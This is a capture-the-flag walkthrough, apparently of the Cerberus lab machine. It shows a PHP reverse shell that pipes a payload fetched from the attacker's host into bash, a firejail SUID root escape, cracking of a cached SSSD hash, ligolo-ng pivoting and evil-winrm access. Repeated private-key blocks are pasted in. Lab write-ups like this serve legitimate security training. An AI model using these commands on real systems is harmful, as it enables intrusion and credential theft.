Q0ejHPn+gtPGdmCLQMM5nSt/TL/q9Gc7xr03zjR/WYtwDfoCcmaFCqOdsCCn3VJ4
v9ezIsla0aEZDDVK34YdTc+B7uonfdbAr/dlRR/5VWD2NxNBIFK3KgGZfSj8q85P
15CxSYnvvBoggD1up0Giv95d5QdxQO/LxQKBwQDRyXYdcKqhnfyAJGk2HneFF62x
sPhZcUeeXkfl4IPY2/TEWBP4dxFXGMdLCfWrQQnpVarfsxtEadNN/glYa2g9pbB0
F4vVIjuUBmcs1q/UG3C/ppD43uix8MiTExpqs1ARQt/zRuUIsVXegVlF6psVogn/
joJmkHI/bJ143vguiLqE0aGNSIXRz32HcpT7N9SfQgMIIFpsb0tk5zGIkonI4O0u
ptbsokz1p01ftDwK/1g5BETcKNaGJPxtMQ/HlNECgcAxRd1W+vVNNtVeDvPV5fwg
z8nJ+YcpV+f4wxaFS95V0J9+BONdmVMc7qjqibcqNxhQgLQXOnJ2TRrQXtJLe9Jj
ejTgsJ+EX5q5yPjWZS7OCeJU/mrG/ZDijfiCB+unMRjuqVylkrRE0cZ3dGidVHEH
MY28yjoNXCVwGX2I961prSM1wFnlrB/m33aibomrSJfwyZLGa0bclR9Jk3AOB7Oc
PVcuvBQl8LoGuDwdNnJJyp2QuqSiYVQEXakOgM92R3ECgcABfQ1yfgcn6GgPPLLm
aGbusdFQrnHEqLIaZI7cCbDFzCG7duiFXcrotEtNs/9jPK3mUu5Icgvie2G9bu0A
DJsLvO44lKYwV/LWRQlcXxWWSq+NHJBww5whDxVNPdh1I1qRFMlj/3/GhQOX9ZD9
lwGMsL6jao5wTdwRqSKg5ewa4Gt6X8ZmqzoP2AoK+PwnoCjJDH3bA+fAVzXQvHc0
gd2qaDYmm5ZwzWIAaDR7VlsKtO8aUHZwnXWQNBj6aVu0TdECgcEAzWIFC2Z0cAuK
Vy7SirjVP/aTefLi42Pv5xb+WGRCod6pOdJIneeA60yp1Z14n2kxciG0msm2r/pW
1k9BnoDbg4grkmUWpZmXuq8UIs7Kpv/tA5Wfvr4g9q9vV/7LHA9b00Tv6iReKY3R
Ldb0QjruVXmRPP9FvfyEVvNNQMsLi1ATTs89sp3gAUYNNQ8Cg4NdM6hW/psyOe2Z
CSFjOKCS/bMr2dFnKw+XeMPkqB66ileunx8nPFdIQVFiF62vSxEa
-----END RSA PRIVATE KEY-----

Now let’s try to run a PHP cmd

(I was not able to make it work, shoutout to 0xdf and ippsec because of there writeup i was able to make it work)

For that, we will use configuration.php

<?php

system("ping -c 1 10.10.16.7");

/*
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
*/

nd then we will change the module path to

then when we visit the module and click on test module which we have created we can see the response

Now it’s time to get revshell

<?php

system("curl 10.10.16.7/shell|bash");

/*
-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEAueKqGxn1boYQ7hLQ21rQKrVwRbQYYZieX7I4hbN4PWyGYl7g
C8uSLG8NoSLMtMEdIuq0+0rMydOokCv3XuFMwcZcxgjZn7Hco+YuOG8PVntKvSPE
LkqTezj7ty2fyubqhYYbS+guXS77kqITn9JE/tpou695eZsEwbUPPNtHbf94+aZY
CcISbWLwhUXm9cevRhzZAAFgSUB8hBv+cGNAhtiHbghAZRf7FEawbDEfJjgzut39
jAlzzeGPMvx7f85vGL7X2x2lcguj3ZyL9UUlXYOQHnz19NiZyxR9tI1oAJBljl68
I2J72kL1W1TGZ9kh77qOpPWVQkobDgxEK4TwQSBgNSrdVlwNGEodBW2329jFGxMf
NxW0gNoyjfq+typZKPtwCgNluGBwQBPmfoCQRfeJup1H4h0xmtPNjC7VJs81VVAF
RU72uwzqQ/E0psHAocKKnFLgIFZzJ2qsdyAGyhCxdI2uj9gwUE5WkL2xaOQ0Rp/D
LGk8cU209g2Wtj/VAgMBAAECggGALQtvl8YsWrZbu2ltWb6Rs8vIc2evQdU7SarV
NhcVw+K81PEzP0B7QU+/AIV/kCy83AV+ymdnpV/oWNmCpigYEtv4BthFrkRqWIBS
woOtNpKFe7yDUYlqYEGgg9TnREK9YZJsInKW66dTOMcUVNYeOJjiKNsep3iIiE1R
LjjgABiYrvyfmGvCTeYcLVuRWo1jXKzoa+8pb07Ubaof+AmhLRwjA2e1/Rl400LH
BUzJBNi5NmcNhkYTHTiz3BHhdojmKs13KhAc2w5aZnQ38u2TAiEjPJDtJcL5F+K1
VaJylR2vN0cjzEpXXbf54qcHnks/m+PR/k/ze0s1Cado+oxxW4AJsm4iYXC6wxfS
u5w/qSZBSAaZYTyhtOFlyHHLyROZYneRpDqX9dlebuk1iqKlR+jSAtM9npi1Qivb
TYj3UM6WXz82YWbixd1QoexR6y/BoFpgeewS2QKAfKPqc5mV/tAilu/rI7oEcNIf
uYVLBxA6BIIdMjJDNxXed53wdhERAoHBAOLVUgQIkJVCAauhqVbaReUGTgEREWMI
AgasMDNB4az5QxYpUBppLMf/h5w1QlGJpe+eQeMOxq9buzBwQlx38Qag17L9V6EJ
Q0ejHPn+gtPGdmCLQMM5nSt/TL/q9Gc7xr03zjR/WYtwDfoCcmaFCqOdsCCn3VJ4
v9ezIsla0aEZDDVK34YdTc+B7uonfdbAr/dlRR/5VWD2NxNBIFK3KgGZfSj8q85P
15CxSYnvvBoggD1up0Giv95d5QdxQO/LxQKBwQDRyXYdcKqhnfyAJGk2HneFF62x
sPhZcUeeXkfl4IPY2/TEWBP4dxFXGMdLCfWrQQnpVarfsxtEadNN/glYa2g9pbB0
F4vVIjuUBmcs1q/UG3C/ppD43uix8MiTExpqs1ARQt/zRuUIsVXegVlF6psVogn/
joJmkHI/bJ143vguiLqE0aGNSIXRz32HcpT7N9SfQgMIIFpsb0tk5zGIkonI4O0u
ptbsokz1p01ftDwK/1g5BETcKNaGJPxtMQ/HlNECgcAxRd1W+vVNNtVeDvPV5fwg
z8nJ+YcpV+f4wxaFS95V0J9+BONdmVMc7qjqibcqNxhQgLQXOnJ2TRrQXtJLe9Jj
ejTgsJ+EX5q5yPjWZS7OCeJU/mrG/ZDijfiCB+unMRjuqVylkrRE0cZ3dGidVHEH
MY28yjoNXCVwGX2I961prSM1wFnlrB/m33aibomrSJfwyZLGa0bclR9Jk3AOB7Oc
PVcuvBQl8LoGuDwdNnJJyp2QuqSiYVQEXakOgM92R3ECgcABfQ1yfgcn6GgPPLLm
aGbusdFQrnHEqLIaZI7cCbDFzCG7duiFXcrotEtNs/9jPK3mUu5Icgvie2G9bu0A
DJsLvO44lKYwV/LWRQlcXxWWSq+NHJBww5whDxVNPdh1I1qRFMlj/3/GhQOX9ZD9
lwGMsL6jao5wTdwRqSKg5ewa4Gt6X8ZmqzoP2AoK+PwnoCjJDH3bA+fAVzXQvHc0
gd2qaDYmm5ZwzWIAaDR7VlsKtO8aUHZwnXWQNBj6aVu0TdECgcEAzWIFC2Z0cAuK
Vy7SirjVP/aTefLi42Pv5xb+WGRCod6pOdJIneeA60yp1Z14n2kxciG0msm2r/pW
1k9BnoDbg4grkmUWpZmXuq8UIs7Kpv/tA5Wfvr4g9q9vV/7LHA9b00Tv6iReKY3R
Ldb0QjruVXmRPP9FvfyEVvNNQMsLi1ATTs89sp3gAUYNNQ8Cg4NdM6hW/psyOe2Z
CSFjOKCS/bMr2dFnKw+XeMPkqB66ileunx8nPFdIQVFiF62vSxEa
-----END RSA PRIVATE KEY-----
*/

and when we click on module test2 we will get the shell

└─$ python3 -m http.server 80                                                            
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
10.10.11.205 - - [13/Aug/2025 17:04:33] "GET /shell HTTP/1.1" 200 -

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.205] 49804
bash: cannot set terminal process group (611): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(icingaweb2) 

Shell as root on Icinga

When looking for SUID, we found something interseting firejail

www-data@icinga:/home$ find / -perm /4000 -exec ls -l {} \\; 2>/dev/null
find / -perm /4000 -exec ls -l {} \\; 2>/dev/null
-rwsr-xr-x 1 root root 14488 Feb  4  2021 /usr/sbin/ccreds_chkpwd
-rwsr-xr-x 1 root root 47480 Feb 21  2022 /usr/bin/mount
-rwsr-xr-x 1 root root 232408 Feb 14  2022 /usr/bin/sudo
-rwsr-xr-x 1 root root 474496 Jan 19  2022 /usr/bin/firejail
-rwsr-xr-x 1 root root 72712 Mar 14  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 35200 Mar 23  2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 40496 Mar 14  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59976 Mar 14  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 72072 Mar 14  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47400 Feb 21  2022 /usr/bin/ksu
-rwsr-xr-x 1 root root 30872 Feb 26  2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44808 Mar 14  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 55672 Feb 21  2022 /usr/bin/su
-rwsr-xr-x 1 root root 35192 Feb 21  2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 35112 Apr  1  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 338536 Nov 23  2022 /usr/lib/openssh/ssh-keysign

Firejail escape

On looking for the vulnerability for firejail We found this

www-data@icinga:/tmp$ python3 firejail.py 
You can now run 'firejail --join=3244' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Now we have to get another shell and run this, and we are root

www-data@icinga:/tmp$ firejail --join=3270
changing root to /proc/3270/root
Warning: cleaning all supplementary groups
Child process initialized in 15.57 ms
www-data@icinga:/tmp$ sudo su -
www-data is not in the sudoers file.  This incident will be reported.
www-data@icinga:/tmp$ su -
root@icinga:~# 

Shell as Matthew on Cerberus

We have seen the internal IP for DC We can confirm this by simple ping sweep

for i in {1..255}; do (ping -c 1 172.16.22.${i} | grep "bytes from" &); done
64 bytes from 172.16.22.1: icmp_seq=1 ttl=128 time=0.595 ms
64 bytes from 172.16.22.2: icmp_seq=1 ttl=64 time=0.015 ms
ping: Do you want to ping broadcast? Then -b. If not, check your local firewall rules
root@icinga:~/cleanup# 

Let’s copy nmap and run it

root@icinga:/tmp# ./np -p- --min-rate 10000 172.16.22.1

Starting Nmap 6.49BETA1 ( <http://nmap.org> ) at 2025-08-13 14:07 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC.cerberus.local (172.16.22.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00067s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
5985/tcp open  unknown
MAC Address: 00:15:5D:5F:E8:00 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
root@icinga:/tmp# 

Sweet WinRM is open

sssd

root@icinga:/tmp# ps -ef --forest
UID          PID    PPID  C STIME TTY          TIME CMD
root        1101       1  0 09:45 tty1     00:00:00 /sbin/agetty -o -p -- \\u --n
root        1065       1  0 09:45 ?        00:00:00 /lib/systemd/systemd-logind
root        1063       1  0 09:45 ?        00:00:00 /usr/sbin/cron -f -P
<--SNIP-->
<--SNIP-->
www-data     948     611  0 09:45 ?        00:00:00  \\_ php-fpm: pool www
root         560       1  0 09:45 ?        00:00:00 /usr/sbin/sssd -i --logger=f
root         794     560  0 09:45 ?        00:00:00  \\_ /usr/libexec/sssd/sssd_b
root         899     560  0 09:45 ?        00:00:00  \\_ /usr/libexec/sssd/sssd_n
root         901     560  0 09:45 ?        00:00:00  \\_ /usr/libexec/sssd/sssd_p
root         558       1  0 09:45 ?        00:00:00 /usr/bin/python3 /usr/bin/ne
<--SNIP-->
<--SNIP-->

SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms.

There are a few files in the db directory. Running strings on cache_cerberus.local.ldb returns a bunch of data, including references to the matthew user and some hashes:

root@icinga:/tmp# ls -la /var/lib/sss/
total 40
drwxr-xr-x 10 root root 4096 Jan 22  2023 .
drwxr-xr-x 38 root root 4096 Jan 29  2023 ..
drwx------  2 root root 4096 Mar  2  2023 db
drwxr-x--x  2 root root 4096 Oct  4  2022 deskprofile
drwxr-xr-x  2 root root 4096 Oct  4  2022 gpo_cache
drwx------  2 root root 4096 Oct  4  2022 keytabs
drwxrwxr-x  2 root root 4096 Aug 13 09:45 mc
drwxr-xr-x  3 root root 4096 Aug 13 09:45 pipes
drwxr-xr-x  3 root root 4096 Aug 13 13:51 pubconf
drwx------  2 root root 4096 Jan 22  2023 secrets
root@icinga:/tmp# strings /var/lib/sss/db/
cache_cerberus.local.ldb       sssd.ldb
ccache_CERBERUS.LOCAL          timestamps_cerberus.local.ldb
config.ldb 

root@icinga:/tmp# strings /var/lib/sss/db/cache_cerberus.local.ldb  
<--SNIP-->
<--SNIP-->
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
isPosix
TRUE
lastUpdate
1677672476
dataExpireTimestamp
initgrExpireTimestamp
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
lastCachedPasswordChange
1677672476
failedLoginAttempts
<--SNIP-->
<--SNIP-->

Let’s crack the hash

└─$ hashcat matthew.hash -m 1800 /home/anurag/stuff/rockyou.txt 
<--SNIP-->
<--SNIP-->
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0:147258369
<--SNIP-->
<--SNIP-->

Let’s set up ligolo-ng for pivoting (refer to this)

└─$ sudo ./proxy -selfcert
[sudo] password for anurag: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: B857F3D462BA49E017C3E07C1D91848D2B71319F8CFB9210533C9B6D85F7D8E0 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \\/ / __ \\______/ __ \\/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\\__, /\\____/_/\\____/     /_/ /_/\\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » INFO[0028] Agent joined.                                 id=aa50efd9-2fae-436e-bb4c-a2a1802c0041 name=www-data@icinga remote="10.10.11.205:49812"
ligolo-ng » 
ligolo-ng » session 
? Specify a session : 1 - www-data@icinga - 10.10.11.205:49812 - aa50efd9-2fae-436e-bb4c-a2a1802c0041                             
[Agent : www-data@icinga] » ifconfig 
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 00:15:5d:5f:e8:01              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.22.2/28                 │
│ IPv6 Address │ fe80::215:5dff:fe5f:e801/64    │
└──────────────┴────────────────────────────────┘
[Agent : www-data@icinga] » interface_create --name ligolo
INFO[0046] Creating a new "ligolo" interface...         
INFO[0046] Interface created!                           
[Agent : www-data@icinga] » interface_add_route --name ligolo --route 172.16.22.0/28
INFO[0058] Route created.  
[Agent : www-data@icinga] » start
[Agent : www-data@icinga] » INFO[0068] Starting tunnel to www-data@icinga (aa50efd9-2fae-436e-bb4c-a2a1802c0041) 

And we can ping DC

└─$ ping 172.16.22.1 
PING 172.16.22.1 (172.16.22.1) 56(84) bytes of data.
64 bytes from 172.16.22.1: icmp_seq=1 ttl=64 time=1123 ms
64 bytes from 172.16.22.1: icmp_seq=2 ttl=64 time=399 ms
^C
--- 172.16.22.1 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2029ms
rtt min/avg/max/mdev = 399.202/761.326/1123.450/362.124 ms, pipe 2

Now we can WinRM and get the user.txt

└─$ evil-winrm -i 172.16.22.1 -u matthew -p 147258369
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\matthew\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\matthew\\Desktop> dir

    Directory: C:\\Users\\matthew\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/13/2025   2:45 AM             34 user.txt

Privilege Escalation

Shell as Administrator

Backup file on ADSelf

We found a backup file in ADSelfService Plus

*Evil-WinRM* PS C:\\Program Files (x86)> dir "ManageEngine\\ADSelfService Plus\\Backup"

    Directory: C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\Backup

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/16/2025  10:14 PM         636500 250516-221358.ezip
-a----        2/15/2023   7:16 AM         320225 OfflineBackup_20230214064809.ezip

*Evil-WinRM* PS C:\\Program Files (x86)> 

Let’s download and analyse

Both files are password protected zip

└─$ file 250516-221358.ezip
250516-221358.ezip: Zip archive data, made by v6.3, extract using at least v5.1, last modified May 16 2025 22:14:06, uncompressed size 82, method=AES Encrypted
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus/loot]
└─$ 7z x OfflineBackup_20230214064809.ezip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)

Extracting archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1

    
Enter password (will not be echoed):

On this show the default password should be Default password: This is the reverse string of the filename. For the filename mentioned above, the password would be: 7451-422180.

Let’s try it out

Since we can list the files on OfflineBackup_20230214064809

─$ 7z l OfflineBackup_20230214064809.ezip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)

Listing archive: OfflineBackup_20230214064809.ezip

--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2023-02-14 20:18:39 ....A            0            0  AAARadiusConfig.txt
2023-02-14 20:18:39 ....A            0            0  AAARememberMeInfo.txt
2023-02-14 20:18:39 ....A            0            0  ADMPDomainGroupRoleMapping.txt
2023-02-14 20:18:40 ....A            0            0  ADSADComputerGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADContactGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADGroupGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADOUGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADSyncAudit.txt
2023-02-14 20:18:40 ....A            0            0  ADSADSyncMultiDCResults.txt
2023-02-14 20:18:44 ....A            0            0  ADSADSyncMultiDCResultsAudit.txt
<--SNIP-->
<--SNIP-->

└─$ echo "OfflineBackup_20230214064809" | rev
90846041203202_pukcaBenilffO

found a hash.txt

└─$ cat hash.txt                           
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q

Let’s crack 'em

└─$ hashcat hash.txt -m 3200 /home/anurag/stuff/rockyou.txt         
hashcat (v6.2.6) starting

<--SNIP-->

$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q:spongebob1

<--SNIP-->

Now I need to find the user for it. Unfortunately, no user matched the password

After that, I thought to look for open ports

└─$ nmap -sT -p- --min-rate 10000 171.16.22.1 -Pn
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 17:56 IST
Nmap scan report for 171.16.22.1
Host is up.
All 65535 scanned ports on 171.16.22.1 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds

but strangely, we found all the ports in an ignored state, but we know winrm port is open (maybe the firewall or some filtering is there?)

After doing some digging I found out Why WinRM Works Only via Linux Jump Host (172.16.22.2)

Finding

• Windows Firewall inbound rules for WinRM (TCP 5985) explicitly allow connections only from 172.16.22.2/32.

• The generic Allow Ports rule does allow 172.16.22.1 and 172.16.22.2, but it does not include port 5985 in its LocalPort list.

• Result:

  • From attacker host directly → source IP not allowed for WinRM → packet silently dropped (filtered in Nmap).

  • From Linux jump host (172.16.22.2) via Ligolo-ng → source IP matches allowed rule → WinRM connection succeeds.

Scripts Used

1. firewall_rule.ps1 – Display all rules with key fields:

netsh advfirewall firewall show rule name=all | Select-String "Rule Name" -Context 0,6 | % {
    $c = $_.Context.PostContext
    [pscustomobject]@{
        'Rule Name' = ($_.Line -split ":\\s*",2)[1]
        'Enabled'   = ($c[0] -split ":\\s*",2)[1]
        'Direction' = ($c[1] -split ":\\s*",2)[1]
        'Action'    = ($c[2] -split ":\\s*",2)[1]
        'Protocol'  = ($c[3] -split ":\\s*",2)[1]
        'LocalPort' = ($c[4] -split ":\\s*",2)[1]
        'RemoteIP'  = ($c[5] -split ":\\s*",2)[1]
    }
} | ft -AutoSize

Output excerpt:

Rule Name                                   Enabled Direction Action Protocol LocalPort RemoteIP
---------                                   ------- --------- ------ -------- --------- --------
Windows Remote Management (HTTP-In)        Yes     Inbound   Allow  TCP      5985      172.16.22.2/32
Windows Remote Management (HTTP-In)        Yes     Inbound   Allow  TCP      5985      172.16.22.2/32
Allow Ports                                 Yes     Inbound   Allow  TCP      53,80,... 172.16.22.1/32,172.16.22.2/32

2. Remote_IP_restriction.ps1 – List only rules with RemoteIP restrictions:

netsh advfirewall firewall show rule name=all verbose | Select-String "Rule Name" -Context 0,15 | ForEach-Object {
    $c = $_.Context.PostContext
    $remoteIP = ($c | Where-Object { $_ -match "^RemoteIP" }) -replace "RemoteIP:\\s*", ""
    if ($remoteIP -and $remoteIP -ne "Any") {
        [pscustomobject]@{
            'Rule Name' = ($_.Line -replace "Rule Name:\\s*", "").Trim()
            'RemoteIP'  = $remoteIP.Trim()
        }
    }
} | Format-Table -AutoSize

Output excerpt:

Rule Name                                   RemoteIP
---------                                   --------
Windows Remote Management (HTTP-In)         172.16.22.2/32
Windows Remote Management (HTTP-In)         172.16.22.2/32
Allow Ports                                  172.16.22.1/32,172.16.22.2/32

3. Detailed check of Allow Ports rule:

netsh advfirewall firewall show rule name="Allow Ports" verbose

Output excerpt:

LocalPort: 53,80,443,88,135,139,389,445,464,593,636,2179,3268,3269,5357,9389,49667-60000
RemoteIP:  172.16.22.1/32,172.16.22.2/32

No 5985 in the LocalPort list → rule does not apply to WinRM.

Conclusion

• WinRM access is hard restricted to the Linux jump host’s IP (172.16.22.2).

• Generic allow rule for 172.16.22.1 doesn’t help because 5985 is excluded.

• Pivoting through 172.16.22.2 is the only way to reach WinRM.

Double Pivot to access all ports

We need to put Ligoglo-ng agent on Windows server as well, because right now:

• My Kali → Linux pivot (172.16.22.2) → Windows server

• Windows firewall limits WinRM to only 172.16.22.2, so it works, but other ports may be restricted to other IPs or LocalSubnet.

• From Kali, our Nmap scans are limited to what 172.16.22.2 is allowed to see.

So if I double Pivot

[ My Kali ] 
     ↓ (Ligolo)
[ Linux Jump Host: 172.16.22.2 ]
     ↓ (Ligolo)
[ Windows Server ]
     ↓
[ Rest of Internal Network ]

Double Pivot

*Evil-WinRM* PS C:\\temp> .\\agent.exe -connect 10.10.16.7:11601 -ignore-cert
agent.exe : time="2025-08-14T07:47:04-07:00" level=warning msg="warning, certificate validation disabled"
    + CategoryInfo          : NotSpecified: (time="2025-08-1...ation disabled":String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
time="2025-08-14T07:47:04-07:00" level=info msg="Connection established" addr="10.10.16.7:11601"

Since Kali already knows 172.16.22.0/28 via first tunnel, but the /32 route to 172.16.22.1 will override it in the routing table.

This forces all DC traffic to go via the second tunnel → direct access from DC’s perspective → bypasses the firewall that blocks your Kali IP.

